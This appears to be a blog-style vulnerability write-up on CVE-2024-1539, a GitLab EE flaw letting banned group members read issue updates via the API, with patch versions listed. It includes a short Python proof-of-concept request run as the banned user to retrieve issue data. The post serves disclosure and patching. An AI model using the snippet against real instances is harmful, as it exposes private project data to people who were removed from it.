CVE-2024-1539: GitLab EE Information Disclosure Vulnerability Affecting Multiple Versions - Details, References, and Exploit

Overview

A recently discovered vulnerability in GitLab Enterprise Edition (EE) threatens user data privacy, allowing unauthorized information disclosure in some cases. The issue is assigned identifier CVE-2024-1539 and affects multiple versions of GitLab EE. The vulnerability allows an unauthorized user to gain access to updates on issues even after being banned from the group using the Application Programming Interface (API). In this long-read post, we'll analyze the vulnerability, provide the code snippets to demonstrate the exploit, and share links to the original references and patches.

Exploit Description

The vulnerability manifests when an unauthorized user, such as a banned group member, makes API calls to fetch updates on issues. Despite being banned from the group, the information disclosure vulnerability CVE-2024-1539 in GitLab EE enables the user to access issue updates.

Here is a code snippet to demonstrate the exploit using Python and the GitLab API

import requests

# Set up authentication as the banned user
headers = {
    'Private-Token': 'your_private_token_here',
}

# The GitLab instance's URL and the vulnerable API endpoint
url = "https://your-gitlab-instance.com/api/v4/projects/:id/issues/:issue_iid?updated_after=:date";

# Replace ':id', ':issue_iid', and ':date' with appropriate values
response = requests.get(url, headers=headers)

# Check if the banned user can access issue updates
if response.status_code == 200:
    print("Vulnerability CVE-2024-1539 exists!")
    print("Issue updates:")
    print(response.json())
else:
    print("GitLab instance is not vulnerable.")

Replace your_private_token_here with the banned user's private token and your-gitlab-instance.com with your GitLab instance's URL. Additionally, substitute :id, :issue_iid, and :date with the project ID, issue ID, and date values to test the exploit.

Original References and Patch Details

Acknowledgments: GitLab initially identified the issue and assigned it identifier CVE-2024-1539, while also releasing a patch for the affected versions.

GitLab Security Advisory: This link will take you to the official GitLab security advisory detailing the vulnerability and necessary mitigation measures.

Patch Details: To address the vulnerability, it is recommended that you update your GitLab EE instance to the latest available version. Here are the relevant patches:

- For instances starting from 15.2 to 16.9.6, update to version 16.9.7
- For instances starting from 16.10 to 16.10.4, update to version 16.10.5
- For instances starting from 16.11 to 16.11.1, update to version 16.11.2

It is essential to review, understand, and apply the appropriate security patches to your GitLab EE instance to ensure that you and your users are protected against the disclosed vulnerability.

Timeline

Published on: 02/05/2025 10:15:22 UTC